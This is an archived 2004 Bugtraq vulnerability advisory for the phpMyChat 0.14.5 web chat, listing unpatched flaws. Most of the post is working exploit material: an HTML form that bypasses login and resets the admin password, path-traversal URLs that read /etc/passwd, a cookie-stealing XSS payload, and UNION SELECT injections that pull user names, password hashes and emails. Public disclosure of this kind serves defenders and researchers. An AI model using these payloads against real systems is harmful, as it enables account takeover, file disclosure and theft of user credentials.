lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3926462080.20040423021022@hex.net.ru>
Date: Fri, 23 Apr 2004 02:10:22 +0400
From: HEX <hex@....net.ru>
To: bugtraq@...urityfocus.com
Subject: phpMyChat 0.14.5


Informations :
°°°°°°°°°°°°
Language : PHP
Bugged Version : phpMyChat ver. 0.14.5 (and less ?)
Patched version : none
Website : http://www.phpheaven.net/
Problems : Permanent XSS, authorization bypass, SQL-injection, include (read) files.

Objects :
°°°°°°°
- lib/login.lib.php3
- admin/adminBody.php3
and more ...

Exploits :
°°°°°°°°
1) For non-authorized login it needs to send only one additional variable: do_not_login="false"

   Example:
   <HTML>

   <HEAD>
   <TITLE>phpMyChat exploit</TITLE>
   </HEAD>

   <BODY>
   <FORM ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm">
   <INPUT type="hidden" name="FORM_SEND" value="1">
   <INPUT type="hidden" name="AUTH_USERNAME" value="admin">
   <INPUT type="hidden" name="AUTH_PASSWORD" value="null">
   <!-- INSERT -->
   <INPUT type="hidden" name="do_not_login" value="false">
   <!-- END INSERT -->
   <INPUT TYPE="hidden" NAME="L" VALUE="russian">
   <INPUT TYPE="text" NAME="U" VALUE="admin">NAME *<BR>
   <INPUT TYPE="text" NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR>
   <INPUT TYPE="text" NAME="FIRSTNAME" VALUE="">FIRST NAME<BR>
   <INPUT TYPE="text" NAME="LASTNAME" VALUE="">LAST NAME<BR>
   <INPUT TYPE="radio" NAME="GENDER" VALUE="1" >male<BR>
   <INPUT TYPE="radio" NAME="GENDER" VALUE="2" >female<BR>
   <INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR>
   <INPUT TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR>
   <INPUT TYPE="text" NAME="EMAIL" VALUE="you@...il.ru">
   <INPUT type="checkbox" name="SHOWEMAIL" value="1" >show e-mail in public information<BR>
   <INPUT TYPE="submit" NAME="submit_type" VALUE="Change">
   </FORM>
   </BODY>

   </HTML>
   
2) To read files one needs to have the rights of administrator (read above for how to get them)!
   
   Variables "sheet" ? "what" are not filtered:
   require("./admin/admin${sheet}.php3");
   and
   if (isset($What) && $What != "") include("./admin/admin".$What.".php3");
   
   Example:
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/passwd%00
   and
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=1

3) Cross-Site Scripting aka XSS
   In input.php3 form there's variable "C", in which the color of messages is transferred.
   
   Example:
   <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\">[CODE]">
   <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"><script>alert(document.cookie)</script><a \"">
   
4) Great number of variables aren't filtered:
   $sortBy, $sortOrder, $startReg, $U, $LastCheck and more ...
   Example SQL-injection:
   http://[TARGET]/chat/usersL.php3?L=russian&R='[SQL]
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*

Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.phpheaven.net/


[ Вложенные файлы    | <none> ]
[ Моск. время 22:29, | Чукча не читатель, чукча CoSysOp... ]
[ Copyright by [HEX] | mailto:hex(a)hex.net.ru ]



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ